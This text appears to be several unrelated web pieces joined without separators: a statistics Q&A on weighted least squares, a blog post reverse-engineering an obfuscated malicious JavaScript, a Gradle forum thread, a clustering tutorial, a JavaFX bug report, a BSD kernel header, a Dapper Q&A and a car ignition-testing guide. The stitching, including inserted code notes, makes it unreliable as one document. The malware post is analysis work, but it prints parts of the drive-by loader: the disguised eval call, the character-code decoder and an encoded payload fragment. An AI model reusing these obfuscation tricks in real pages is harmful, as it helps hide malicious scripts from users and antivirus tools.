Weighted least squares (WLS) and robust standard errors are sometimes presented as alternative approaches for obtaining reliable standard errors of estimates of regression coefficients in the presence of heteroscedasticity. However, I notice that my software (gretl) offers robust standard errors as an option when using WLS. A situation in which it seems this might be useful is where, in a regression of Y on X, there is a clear reason for heteroscedasticity, for example a scale effect such that larger values of Y are expected to be associated with larger variances. One might then use WLS, giving a higher weighting to observations with smaller Y (or, perhaps better, to observations with smaller E[Y | X], as inferred from an initial OLS regression). However, it might be found that the WLS residuals suggested some remaining heteroscedasticity that the weighting had not eliminated. This would suggest that the standard errors estimated by WLS might not be entirely reliable, and to address this one might opt for robust standard errors (rather than attempting to do so via some more complex weighting pattern).

Question: Assuming the number of observations is reasonably large (over 100, say), are there any pitfalls in using WLS with robust standard errors when estimating standard errors of regression coefficients?

• This answer (math.stackexchange.com/questions/681332/robust-standard-errors/…), although dealing with robust standard errors in the OLS case and not in the WLS case, discusses why one should not use robust errors uncritically, so perhaps it may be of some use to you. – Alecos Papadopoulos Mar 21 '14 at 2:30

• @AlecosPapadopoulos Thanks ... so applying this to WLS, it is important to test for any remaining heteroscedasticity, e.g. by examining the WLS residuals, rather than automatically opting for robust standard errors. – Adam Bailey Mar 21 '14 at 7:23

Answer: I break your concerns about the estimator into two areas: efficiency and asymptotic validity. I'll define a procedure as asymptotically valid if the point estimates are consistent and the estimated variance-covariance matrix is consistent. As an extension of Alecos's arguments shows, the robust (i.e., sandwich) standard errors result in asymptotic validity regardless of the assumed weighting matrix, and in fact this result even holds for clustered/correlated data (as long as independence holds at the uppermost level of clustering). I'll define the efficiency of the estimate in terms of the true asymptotic variance/covariance matrix of the coefficients. Of course, from Gauss-Markov we know that only when you select weights proportional to the inverse conditional variance of each observation will you achieve the smallest limiting variance.$^1$ So based on first-order, asymptotic concerns, we may just take the best stab at estimating the weightings we can, then go ahead and use robust standard errors to guard against mistakes in the weights. To say anything more refined than this we need to think of second-order asymptotic or finite-sample concerns. An example of a second-order concern might be "variance of the variance." While I don't have the inclination to try to make Alecos's argument rigorous, I believe it does hold: when you estimate additional, unnecessary parameters you will introduce additional variance in the remaining parameters. (You might be able to make it rigorous by considering Schur decompositions of blocks of the information matrix?)
So there is probably a second-order bias-variance tradeoff present: when you use the robust standard errors, you eliminate bias in the standard errors, at the cost of maybe more variance in them. Most people seem to care more about the bias than the variance, but if this tradeoff is important, then the only advice I have to offer is to simulate or bootstrap to see how much it might matter in your application. There's probably some additional theory, extant or yet to be developed, that could offer advice by using higher-order asymptotics, but that's beyond my pay grade.

$^1$ Proof here, apparently originally due to Aitken.
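As a practical illustration of the advice above — estimate the weights as best you can, then add robust standard errors — here is a minimal Python sketch. It is not from the original thread; the simulated data, the choice of weights and the variable names are my own, and statsmodels is assumed to be available. It fits WLS with rough inverse-variance weights and compares the model-based standard errors with heteroscedasticity-robust (sandwich) ones:

import numpy as np
import statsmodels.api as sm

rng = np.random.default_rng(0)
n = 200
x = rng.uniform(1, 10, n)
X = sm.add_constant(x)
y = 1.0 + 2.0 * x + rng.normal(0, 0.5 + 0.3 * x)          # error sd grows with x

ols = sm.OLS(y, X).fit()
w = 1.0 / np.maximum(ols.fittedvalues, 1e-6) ** 2          # rough guess: variance proportional to E[Y|X]^2

wls_plain  = sm.WLS(y, X, weights=w).fit()                 # standard errors that trust the weights
wls_robust = sm.WLS(y, X, weights=w).fit(cov_type="HC3")   # sandwich (robust) standard errors

print(wls_plain.bse)
print(wls_robust.bse)

If the two sets of standard errors differ noticeably, that is a hint that the weights have not fully captured the heteroscedasticity, which is exactly the situation described in the question.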
Wednesday, April 6, 2011

Reverse engineering a malicious javascript part 1

My antivirus program flagged a malicious javascript a few days ago. At some point in my web browsing, a webpage quietly served up a malicious script in addition to the regular content. It was saved to my browser's cache and quarantined by my antivirus. Being the curious person that I am, I thought I'd try my hand at understanding how it works. Of course, as is typical of malicious scripts, it was obfuscated. Instead of looking like nice Javascript:

<script type="text/javascript">
document.write("<h1>This is a heading</h1>");
document.write("<p>This is a paragraph.</p>");
document.write("<p>This is another paragraph.</p>");
</script>

the malicious script is a mess, deliberately difficult to read (click to enlarge): The sequence of numbers keeps going for the rest of the script. Malware authors use tricks like this to keep people like me from understanding how the script works, and to make it more difficult for antivirus software to detect the page. If the AV can't penetrate the obfuscation, then once it does start detecting this page, all the malware author needs to do is obfuscate it differently to force a new signature to be generated. For more information on reverse engineering malware, take a look at this BlackHat presentation (pdf).

The curious thing about obfuscation is that it's designed to be difficult for people to understand yet simple for computers to understand. Luckily for me, that means we can use a javascript engine to translate it all back for us. Didier Stevens has modified Mozilla's Spidermonkey for exactly this purpose. All I need to do is extract the javascript from the rest of the page so I can feed it to the engine. Since this is pretty simple, though, I'm going to do this by hand. Since the code has no line breaks or anything else useful, I fed it into Eclipse to clean it up and grab the javascript. Cleaning it up in Eclipse makes the initial part of the script make a lot more sense. Take a look (click to enlarge):

If you know a little Javascript, you can already get an idea of what's going on. We've got a hidden textarea with some text in it. Right now it's meaningless, but this is going to be modified by the Javascript to pull the script together. The applet section makes a reference to a Java applet that would've been housed on the same webserver as this malicious webpage. Since I found this file in my cache, the applet isn't available for me to examine. Right now it's the content in the script tags that we're going to look at. This is the part of the script that pulls together all the obfuscated components of the script and tells the browser how to execute them to infect itself with whatever piece of badness the author wants to hit me with. Let's work through this step by step.

var date = new Date();
var f = date.getFullYear()-2009;

First, the script gets the date, pulls the year out, subtracts 2009, and saves it to the variable f. This limits the script to only this year, but the lifetime of an attack like this measures in days at the most, so that's not a significant limitation. All this is a complicated way of defining f=2. Next, we have:

zni = '2011val'.replace(date.getFullYear(),'');
var e = new Function('axlzg','return e'+zni)();

zni is another variable.
Here, we take the string '2011val' and then delete the current year, so zni = 'val'. Then we define a function, e, using new Function: its (unused) parameter is named 'axlzg', and its body is the string 'return e' with the value of zni appended. This computes to return eval, which is a Javascript command to evaluate a string as if it was code. Moving on:

xzjc=document.getElementById('textarea').value;
var content = '';

There's another uninformatively-named variable here, but it's pretty obvious what it does. xzjc grabs the content of the text area, so xzjc = 'tring.from2011har2011ode'. The script also defines a variable 'content', which is a blank string. We're getting somewhere now!

var fnxes=e('S'+xzjc.split(date.getFullYear()).join('C'));

This one's a little more complicated: another text-manipulation exercise that will further translate things. Like math, we need to start from inside the parentheses and work outwards. First, we're taking xzjc from the last line. We split it into separate strings using the current year as the split point, yielding 'tring.from', 'har' and 'ode', re-join the fragments using a "separator" of 'C', and then put 'S' in front. Now we have 'String.fromCharCode', which is a Javascript function that takes encoded characters and decodes them to a string. This result is run through the function "e", which takes the string and converts it back to code, so it can execute. The reason the author is bothering with all this is because String.fromCharCode() is a common function that takes a set of character codes (in this case numbers) and converts them back to letters. For example, "51*f" is 51*2 = 102, which is the Unicode character code for f. Malware authors often use it to obfuscate their code (as we'll soon see), so it's an indicator that antivirus companies will trigger on. In this script, the malware author has to obfuscate their obfuscation method in order to try and evade the antivirus signature. I found this script because it triggered my antivirus, so even all this obfuscation failed. Let's look at the last couple lines of this script.

content = fnxes(51*f,58.5*f,55*f,49.5*f,58*f,52.5*f,55.5*f, 55*f,16*f,50.5*f,55*f,50*f,47.5*f,57*f,50.5*f,50*f,52.5*f, 57*f,50.5*f,49.5*f,58*f,20*f,20.5*f,61.5*f,62.5*f,29.5*f, 50*f,........ );
e(content);

There's actually a lot more numbers in there than I'm showing; I'm just cropping it out for simplicity's sake. The script is taking the variable "content" and actually defining it. It's taking each of these numbers and multiplying it by f, which we already learned was 2. Then, it's running fnxes (which is really String.fromCharCode) against it. Now I'm going to turn to Spidermonkey to translate all this crap into real code; it would just be too annoying to do by hand. So, after we multiply the numbers by 2 and then turn them back into a string, we get the payload. Unfortunately the payload itself is pretty long and complicated, so that'll have to wait for part 2 so I can have time to figure out what's going on.
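If you want to sanity-check the decoding without a modified Spidermonkey, the same string tricks and the character-code math can be reproduced in a few lines of Python. This is a quick sketch of my own (Python is used only for convenience; the variable names mirror the obfuscated script, and only the handful of codes quoted above are decoded):

year = "2011"

# 'return e' + zni  ->  'return eval'
zni = "2011val".replace(year, "")
print(zni)                                    # val

# 'S' + 'C'.join(split on the year)  ->  'String.fromCharCode'
xzjc = "tring.from2011har2011ode"
print("S" + "C".join(xzjc.split(year)))       # String.fromCharCode

# Each payload number times f (= 2) is a character code.
f = 2
codes = [51, 58.5, 55, 49.5, 58, 52.5, 55.5, 55, 16]    # first few codes from the script
print("".join(chr(int(n * f)) for n in codes))          # "function " -- readable JavaScript appears

The full payload is just the same arithmetic applied to the complete list of numbers.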
Snapshot dependencies with sources/test classifier are not updated We publish source and test code jars for common libraries to Nexus. So we end up with something like: core-1.0-SNAPSHOT.jar core-1.0-SNAPSHOT-sources.jar core-1.0-SNAPSHOT-test.jar Then I refer to the test jar from another project like so: testCompile group: 'foo', name: 'core', version: '1.0-SNAPSHOT.jar', classifier: 'test' This works the first time it is run but the updates do not get downloaded. So I have the usual: configurations.all { resolutionStrategy { //don't cache snapshots cacheChangingModulesFor 0, 'seconds' } } This works for the main artifact but not for the test jar. What can I do to get the test jar to update like a normal SNAPSHOT? Cheers, Ben Hi Ben, What Gradle version? And what’s the repository definition that this dependency will be coming from? Gradle version M8a The repository is a Nexus Maven repo. I meant to mention that if I run --refresh dependencies, then that brings down the latest test jar. So it is possible, but I’d prefer it to work like a standard changing dependency. I just noticed that the version in: group: 'foo', name: 'core', version: '1.0-SNAPSHOT.jar', classifier: 'test' Doesn’t look right. Is that a copy/paste error? sorry yes that’s a typo As I say - it works OK first time (i.e. nothing in local cache), and if I do --refresh dependencies. I suspect it is using the default caching resolution strategy rather than the zero seconds one I have specified. I’ll try to see today if I get a new version down after 24hrs. A bit more detail in case it is useful we create the test code jar like so: task testsJar(type: Jar, dependsOn: testClasses) { classifier = 'tests' from sourceSets.test.output.classesDir } and publish to nexus by adding it to the artifacts like so: artifacts { archives sourcesJar archives testsJar } FWIW we also seem to have the same problem with the sources jar. Linked to GRADLE-2175. Can you try declaring your dependency like: testCompile group: 'foo', name: 'core', version: '1.0-SNAPSHOT.jar', classifier: 'test', changing: true I suspect that we’re not automatically flagging 1.0-SNAPSHOT-test.jar as ‘changing’. Hi Daz yes I have tried this but it didn’t seem to help. I’ll have another go when I get a chance and let you know. OK I can confirm that using ‘changing: true’ does not solve the problem. Thanks, Ben We had to publish sources inside the main jar and remove publishing of sources artifacts in order to avoid troublesome desynchronization on the IDE side… otherwise people would see old sources whilst using updated binaries. This is still an issue. Anyone figured out how to fix this? Thanks
Software Development

Fundamentals Of Unsupervised Learning with Python

Unsupervised learning is a branch of machine learning widely used in AI. In plain language, it is machine learning from unstructured and unlabeled data: the algorithm finds patterns on its own, without supervision, and makes predictions from them. Unsupervised learning therefore covers a variety of techniques, from clustering to factorization and density estimation. Here we will look at its fundamentals and the implementation of the main algorithms. To understand the concept in detail, let's look at its building blocks — clusters, predictions and labels — one by one.

Clustering: Clustering is a basic way of structuring and classifying data. In plain words, clustering groups data points according to their similarities and dissimilarities. It divides the data into subsets, known as clusters, which are then used for further processing. Below is one simple reference for a cluster description (table not reproduced here).

So how exactly are predictions made in an unsupervised process?
• First, an input is given to the machine.
• The input is checked against the existing clusters.
• If the input matches a cluster, a prediction is made; otherwise it fails.

K-means and mean shift are the main algorithms used to build clusters. Let's have a closer look at both.

K-means: The K-means algorithm is one of the best-known ways to cluster data. To use it, we have to assume a fixed number of clusters up front, which is why this approach is called flat clustering. The basic steps are:
• Set the desired number of clusters, K.
• Assign each data point to a cluster and update the cluster centroids. This is an iterative algorithm, so the centroid locations are updated until they stop moving (reach their optimal locations).

To understand this better, we have an example below.

import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
import numpy as np
from sklearn.cluster import KMeans

The code below can be used to generate a two-dimensional dataset:

from sklearn.datasets.samples_generator import make_blobs
X, y_true = make_blobs(n_samples = 500, centers = 4, cluster_std = 0.40, random_state = 0)

Use the code below to visualize the dataset:

plt.scatter(X[:, 0], X[:, 1], s = 50);
plt.show()

Now initialize K-means, setting the required parameter — the number of clusters (n_clusters) — and fit it to the data:

kmeans = KMeans(n_clusters = 4)
kmeans.fit(X)

Mean Shift Algorithm: Mean shift is another powerful clustering algorithm, but unlike K-means it does not rely on an assumed number of clusters, because of its non-parametric nature. The basic steps of the mean shift algorithm are:
• First, every data point is assigned to its own cluster.
• The algorithm computes the centroids and assigns them new locations, moving them towards regions of higher density.
• Once a density peak has been reached, the centroid stops moving.

Now for the coding part! With the following code one can implement the mean shift clustering algorithm in Python.
import numpy as np
from sklearn.cluster import MeanShift
import matplotlib.pyplot as plt
from matplotlib import style
style.use("ggplot")

make_blobs from sklearn.datasets will help in generating a two-dimensional dataset with three blobs:

from sklearn.datasets.samples_generator import make_blobs

Now, to visualise the generated data, use the following code:

centers = [[2,2],[4,5],[3,10]]
X, _ = make_blobs(n_samples = 500, centers = centers, cluster_std = 1)
plt.scatter(X[:,0],X[:,1])
plt.show()

Hierarchical Clustering

Hierarchical clustering is another means of clustering that creates a hierarchy of clusters. It starts from the assigned data points and repeatedly merges the closest groups; the algorithm ends when only a single cluster is left. There are two main types of hierarchical clustering: agglomerative and divisive.

Agglomerative: also known as the bottom-up approach. Each cluster is merged with its nearest neighbour according to a linkage criterion, and the hierarchy takes shape as clusters of interest emerge from a few linked observations. It is applicable to large numbers of clusters and can be more effective than K-means.

Divisive: also known as top-down. Here everything starts in one cluster, which is split recursively as we move down the hierarchy. This process is relatively slower than agglomerative clustering and K-means.

Now let's have a look at one example of hierarchical clustering with very simple data:

In [4]: from scipy.cluster.hierarchy import linkage
        # generate the linkage matrix
        Z = linkage(X, 'ward')

In [5]: from scipy.cluster.hierarchy import cophenet
        from scipy.spatial.distance import pdist
        c, coph_dists = cophenet(Z, pdist(X))
        c
Out[5]: 0.98001483875742679

With these very simple examples, one can understand the roles of data, clusters, predictions and inputs. All of these examples can be run on any platform with a Python installation.
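To make the hierarchical-clustering fragment above fully runnable, here is a small self-contained sketch. It is an illustrative completion rather than part of the original article: it generates its own blob data, uses the current sklearn.datasets import path instead of the older samples_generator module, and cuts the tree into flat clusters with fcluster:

import matplotlib.pyplot as plt
from scipy.cluster.hierarchy import linkage, fcluster, dendrogram
from sklearn.datasets import make_blobs

# Synthetic two-dimensional data, as in the earlier examples
X, _ = make_blobs(n_samples=150, centers=3, cluster_std=0.8, random_state=0)

Z = linkage(X, method="ward")                       # bottom-up (agglomerative) linkage matrix
labels = fcluster(Z, t=3, criterion="maxclust")     # cut the tree into 3 flat clusters

plt.figure(figsize=(10, 4))
plt.subplot(1, 2, 1)
dendrogram(Z, no_labels=True)                       # the full merge hierarchy
plt.title("Dendrogram")
plt.subplot(1, 2, 2)
plt.scatter(X[:, 0], X[:, 1], c=labels, s=30)       # the flat labelling
plt.title("Flat clusters from fcluster")
plt.show()

Here fcluster with criterion="maxclust" plays the role that choosing n_clusters plays for K-means: it turns the full hierarchy produced by linkage into a single flat labelling.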
JDK-8125336: Cannot style Choicebox Dropdown

Details
• Bug • Status: Resolved • P4 • Resolution: Cannot Reproduce
• fx2.0.2 • 8 • javafx
• Windows 7, Windows XP, netbeans 7.2 and 7.3, Scenebuilder 1.0 and 1.1.1

Description
I am trying to change the background color and hover color of the drop down menu that appears in a choice box. When I preview the attached code in SceneBuilder, the style is applied properly: the drop down has a red background and the hover over color is salmon. The other rules are applied as well. If I compile the code and run it, the dropdown appears in default grey and the hover over in default blue. The .context-menu and #choice-box-menu-item:hover CSS selector rules are not being applied in compiled code.

Attachments
1. SampleController.java 0.7 kB
2. Sample.fxml 1.0 kB
3. Sample.fxml 0.9 kB
4. sample.css 0.7 kB
5. JavaFXApplication.java 1 kB
6. fromScenebuilder.png 6 kB
7. Compiled.png 7 kB

People
psomashe Parvathi Somashekar (Inactive)
ethompsonjfx Edward Thompson (Inactive)
File:  [DragonFly] / src / sys / net / netisr.h Revision 1.9: download - view: text, annotated - select for diffs Sat Mar 6 19:40:30 2004 UTC (11 years, 2 months ago) by dillon Branches: MAIN CVS tags: HEAD Simplify LWKT message initialization semantics to reduce API confusion. Cleanup netisr messaging to provide more uniform error handling and to use lwkt_replymsg() unconditionally for both async/auto-free and sync messages as the abstraction intended. This also fixes a reply/free race. 1: /* 2: * Copyright (c) 1980, 1986, 1989, 1993 3: * The Regents of the University of California. All rights reserved. 4: * 5: * Redistribution and use in source and binary forms, with or without 6: * modification, are permitted provided that the following conditions 7: * are met: 8: * 1. Redistributions of source code must retain the above copyright 9: * notice, this list of conditions and the following disclaimer. 10: * 2. Redistributions in binary form must reproduce the above copyright 11: * notice, this list of conditions and the following disclaimer in the 12: * documentation and/or other materials provided with the distribution. 13: * 3. All advertising materials mentioning features or use of this software 14: * must display the following acknowledgement: 15: * This product includes software developed by the University of 16: * California, Berkeley and its contributors. 17: * 4. Neither the name of the University nor the names of its contributors 18: * may be used to endorse or promote products derived from this software 19: * without specific prior written permission. 20: * 21: * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 22: * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23: * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 24: * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 25: * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26: * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 27: * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 28: * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 29: * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 30: * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 31: * SUCH DAMAGE. 32: * 33: * @(#)netisr.h 8.1 (Berkeley) 6/10/93 34: * $FreeBSD: src/sys/net/netisr.h,v 1.21.2.5 2002/02/09 23:02:39 luigi Exp $ 35: * $DragonFly: src/sys/net/netisr.h,v 1.9 2004/03/06 19:40:30 dillon Exp $ 36: */ 37: 38: #ifndef _NET_NETISR_H_ 39: #define _NET_NETISR_H_ 40: 41: #include <sys/msgport.h> 42: 43: /* 44: * The networking code runs off software interrupts. 45: * 46: * You can switch into the network by doing splnet() and return by splx(). 47: * The software interrupt level for the network is higher than the software 48: * level for the clock (so you can enter the network in routines called 49: * at timeout time). 50: */ 51: 52: /* 53: * Each ``pup-level-1'' input queue has a bit in a ``netisr'' status 54: * word which is used to de-multiplex a single software 55: * interrupt used for scheduling the network code to calls 56: * on the lowest level routine of each protocol. 
57: */ 58: #define NETISR_RESERVED0 0 /* cannot be used */ 59: #define NETISR_POLL 1 /* polling callback */ 60: #define NETISR_IP 2 /* same as AF_INET */ 61: #define NETISR_NS 6 /* same as AF_NS */ 62: #define NETISR_AARP 15 /* Appletalk ARP */ 63: #define NETISR_ATALK2 16 /* Appletalk phase 2 */ 64: #define NETISR_ATALK1 17 /* Appletalk phase 1 */ 65: #define NETISR_ARP 18 /* same as AF_LINK */ 66: #define NETISR_IPX 23 /* same as AF_IPX */ 67: #define NETISR_USB 25 /* USB soft interrupt */ 68: #define NETISR_PPP 27 /* PPP soft interrupt */ 69: #define NETISR_IPV6 28 /* same as AF_INET6 */ 70: #define NETISR_NATM 29 /* same as AF_NATM */ 71: #define NETISR_NETGRAPH 30 /* same as AF_NETGRAPH */ 72: #define NETISR_POLLMORE 31 /* check if we need more polling */ 73: 74: #define NETISR_MAX 32 75: 76: #ifdef _KERNEL 77: 78: #include <sys/protosw.h> 79: 80: struct netmsg; 81: 82: typedef int (*netisr_fn_t)(struct netmsg *); 83: 84: /* 85: * Base class. All net messages must start with the same fields. 86: */ 87: struct netmsg { 88: struct lwkt_msg nm_lmsg; 89: netisr_fn_t nm_handler; 90: }; 91: 92: struct netmsg_packet { 93: struct lwkt_msg nm_lmsg; 94: netisr_fn_t nm_handler; 95: struct mbuf *nm_packet; 96: }; 97: 98: struct netmsg_pr_ctloutput { 99: struct lwkt_msg nm_lmsg; 100: netisr_fn_t nm_handler; 101: int (*nm_prfn) (struct socket *, struct sockopt *); 102: struct socket *nm_so; 103: struct sockopt *nm_sopt; 104: }; 105: 106: struct netmsg_pr_timeout { 107: struct lwkt_msg nm_lmsg; 108: netisr_fn_t nm_handler; 109: void (*nm_prfn) (void); 110: }; 111: 112: /* 113: * for dispatching pr_ functions, 114: * until they can be converted to message-passing 115: */ 116: int netmsg_pr_dispatcher(struct netmsg *); 117: 118: #define CMD_NETMSG_NEWPKT (MSG_CMD_NETMSG | 0x0001) 119: #define CMD_NETMSG_POLL (MSG_CMD_NETMSG | 0x0002) 120: 121: #define CMD_NETMSG_PRU_ABORT (MSG_CMD_NETMSG | 0x0003) 122: #define CMD_NETMSG_PRU_ACCEPT (MSG_CMD_NETMSG | 0x0004) 123: #define CMD_NETMSG_PRU_ATTACH (MSG_CMD_NETMSG | 0x0005) 124: #define CMD_NETMSG_PRU_BIND (MSG_CMD_NETMSG | 0x0006) 125: #define CMD_NETMSG_PRU_CONNECT (MSG_CMD_NETMSG | 0x0007) 126: #define CMD_NETMSG_PRU_CONNECT2 (MSG_CMD_NETMSG | 0x0008) 127: #define CMD_NETMSG_PRU_CONTROL (MSG_CMD_NETMSG | 0x0009) 128: #define CMD_NETMSG_PRU_DETACH (MSG_CMD_NETMSG | 0x000a) 129: #define CMD_NETMSG_PRU_DISCONNECT (MSG_CMD_NETMSG | 0x000b) 130: #define CMD_NETMSG_PRU_LISTEN (MSG_CMD_NETMSG | 0x000c) 131: #define CMD_NETMSG_PRU_PEERADDR (MSG_CMD_NETMSG | 0x000d) 132: #define CMD_NETMSG_PRU_RCVD (MSG_CMD_NETMSG | 0x000e) 133: #define CMD_NETMSG_PRU_RCVOOB (MSG_CMD_NETMSG | 0x000f) 134: #define CMD_NETMSG_PRU_SEND (MSG_CMD_NETMSG | 0x0010) 135: #define CMD_NETMSG_PRU_SENSE (MSG_CMD_NETMSG | 0x0011) 136: #define CMD_NETMSG_PRU_SHUTDOWN (MSG_CMD_NETMSG | 0x0012) 137: #define CMD_NETMSG_PRU_SOCKADDR (MSG_CMD_NETMSG | 0x0013) 138: #define CMD_NETMSG_PRU_SOSEND (MSG_CMD_NETMSG | 0x0014) 139: #define CMD_NETMSG_PRU_SORECEIVE (MSG_CMD_NETMSG | 0x0015) 140: #define CMD_NETMSG_PRU_SOPOLL (MSG_CMD_NETMSG | 0x0016) 141: 142: #define CMD_NETMSG_PR_CTLOUTPUT (MSG_CMD_NETMSG | 0x0017) 143: #define CMD_NETMSG_PR_TIMEOUT (MSG_CMD_NETMSG | 0x0018) 144: 145: typedef lwkt_port_t (*lwkt_portfn_t)(struct mbuf *); 146: 147: struct netisr { 148: lwkt_port ni_port; /* must be first */ 149: lwkt_portfn_t ni_mport; 150: netisr_fn_t ni_handler; 151: }; 152: 153: lwkt_port_t cpu0_portfn(struct mbuf *m); 154: void netisr_dispatch(int, struct mbuf *); 155: int netisr_queue(int, struct mbuf 
*); 156: void netisr_register(int, lwkt_portfn_t, netisr_fn_t); 157: int netisr_unregister(int); 158: void netmsg_service_loop(void *arg); 159: void schednetisr(int); 160: 161: #endif /* KERNEL */ 162: 163: #endif /* _NET_NETISR_H_ */
5 I am trying to save a model to the database using Dapper. I set up the parameters with an input/output parameter that is an int with an existing primary key value used for an update. public async Task<TKey> SaveAsync<TKey>(IGraph builder, IDataContext context = null) { var parameters = this.GetParametersFromDefinition(builder, DefinitionDirection.In); // See if we have a key defined. If not, we assume this is a new insert. // Otherwise we pull the key out and assume it's an update. PropertyDefinition key = builder.GetKey(); if (key != null) { parameters.Add(key.ResolvedName, key.PropertyValue, null, ParameterDirection.InputOutput); } else { throw new InvalidOperationException("The data graph did not have a primary key defined for it."); } await this.ExecuteProcedure(parameters, builder, context); object returnedId = parameters.Get<TKey>(key.ResolvedName); return returnedId == null ? default(TKey) : (TKey)returnedId; } private Task ExecuteProcedure(DynamicParameters parameters, IGraph builder, IDataContext context = null) { ProcedureDefinition mapping = builder.GetProcedureForOperation(ProcedureOperationType.Insert); if (string.IsNullOrEmpty(mapping.StoredProcedure)) { throw new InvalidOperationException("No stored procedure mapped to the builder."); } // Query the database return this.SetupConnection( context, (connection, transaction) => connection.ExecuteAsync( mapping.StoredProcedure, parameters, commandType: CommandType.StoredProcedure, transaction: transaction)); } It is invoked like this: this.Address.AddressId = await repository.SaveAsync<int>(graph); When I evaluate the parameters, I see my input/output parameters on it. Dynamic Parameters However when I try to execute this line in my save: TKey returnedId = parameters.Get<TKey>(key.ResolvedName); I am given the following exception: Exception:Caught: "Attempting to cast a DBNull to a non nullable type! Note that out/return parameters will not have updated values until the data stream completes (after the 'foreach' for Query(..., buffered: false), or after the GridReader has been disposed for QueryMultiple)" (System.ApplicationException) A System.ApplicationException was caught: "Attempting to cast a DBNull to a non nullable type! Note that out/return parameters will not have updated values until the data stream completes (after the 'foreach' for Query(..., buffered: false), or after the GridReader has been disposed for QueryMultiple)" Time: 7/21/2015 10:19:48 PM Thread:[7200] I am assuming this is an issue with the generic type not being nullable in this case, as it's an integer. Is this because Dapper always returns a nullable? I've just assigned the OUTPUT on the stored procedure a constant value for now to make sure the output is assigned something. How can I work around dapper returning a nullable, is the only way around it my passing in int? as the generic type? Update I was able to resolve it using this approach. SO won't let me post it as an answer yet. When the time limit is up, I'll post an answer, unless someone else has any better ideas. object returnedId = parameters.Get<TKey>(key.ResolvedName); if (returnedId == null) { return default(TKey); } return (TKey)returnedId; 1 If DBNull is a valid value and should mean something other than default(TKey) (ex: default(int) = 0), and if TKey will always be a value type, then constrain TKey as struct like so: public async Task<TKey?> SaveAsync<TKey>(IGraph builder, IDataContext context = null) where TKey : struct { ... } Then get the key like so: TKey? 
returnedId = parameters.Get<TKey?>(key.ResolvedName); The return type of SaveAsync will reflect that the key could be null. If the key should never be null, and if DBNull should be defaulted to default(TKey), then simply use the following: public async Task<TKey?> SaveAsync<TKey>(IGraph builder, IDataContext context = null) where TKey : struct { ... return parameters.Get<TKey?>(key.ResolvedName).GetValueOrDefault(); }
How To Test The GM Distributor Mounted Ignition Module The GM distributor mounted ignition control module (ICM), can be tested on the car or truck easily. Not only that, you don't need any expensive tools to do it. Now, AutoZone can test it for you (if you remove it and take it to them), but for those of you that can't afford the time this involves or for those who want to add another diagnostic technique to their ‘toolbox’ of know-how, this article is for you. This article will walk you step by step thru' the testing and diagnostic of a MISFIRE or NO START Condition. You'll test the following components: ignition control module, spark plug wires, distributor cap and rotor and ignition coil and pick up coil of the GM 4.3L, 5.0L, 5.7L and 7.4L distributor type ignition system. Before we start, just want to remind you that since this is an On Car test, do not remove the ignition control module from the distributor or the ignition coil. Some of the images in this article show them off of the vehicle just to make it easier to explain their testing process. The following tutorials will also help you: 1. How To Test The ‘Spider’ Fuel Injector Assembly (GM 4.3L, 5.0L, 5.7L) (at: troubleshootmyvehicle.com). 2. How To Diagnose Misfire Codes (GM 4.3L, 5.0L, 5.7L) (at: troubleshootmyvehicle.com). 3. GM Engine Compression Test (GM 4.3L, 5.0L, 5.7L) (at: troubleshootmyvehicle.com). 4. How To Test A Misfire / No Spark-No Start Condition (4.3L, 5.0L, 5.7L 96-04). You can find this tutorial in Spanish here: Cómo Probar El Sistema de Encendido (GM 4.3L, 5.0L, 5.7L) (at: autotecnico-online.com). If you need to test the 7 pin (older) ignition module, the following tutorial will help: How To Test The Ignition Control Module (2.8L V6 GM). The typical ignition system circuit diagram for the 1992-1995 4.3L, 5.0L, and 5.7L 1500, 2500, 3500 Pick Up and Suburban can be found here: Ignition System Circuit Diagram (1992-1995 Chevy/GMC Pick Up And SUV). Basic Operating Theory Here is a little background information (and I stress ‘little’) explained in plain english, to help you diagnose this NO START/NO SPARK Condition of the distributor. In a nutshell, when you crank up the engine (and the system is working properly): 1. The distributor shaft starts to rotate, inducing the pick up coil to start generating its magnetic signal. 2. This pick up coil signal is sent directly to the ignition control module. 3. The ignition module, upon receiving this pick up coil signal (for all intended purposes it's a Crankshaft Position Sensor signal) converts it to a digital signal that is now sent to the fuel injection computer. This digital signal is called the: Distributor Reference Hi Signal in the majority of the service literature. 4. Also, after receiving the pick up coil signal, the ignition control module starts to switch the Primary Current (of the ignition coil) On and Off. As you might already know, it's this ‘Switching Signal’ that makes the ignition coil start sparking away. 5. OK, once the fuel injection computer receives the Reference Hi Signal, it starts activating the fuel injectors and above 400 RPM, starts to send a 5 V Bypass Signal to the ignition control module. It's with the Bypass Signal that the computer starts to retard and advance ignition timing with the IC Signal. 6. So, then above 400 RPM (any RPM above this and the ECM considers the engine as having started) the fuel injection computer starts to control the ignition timing. 
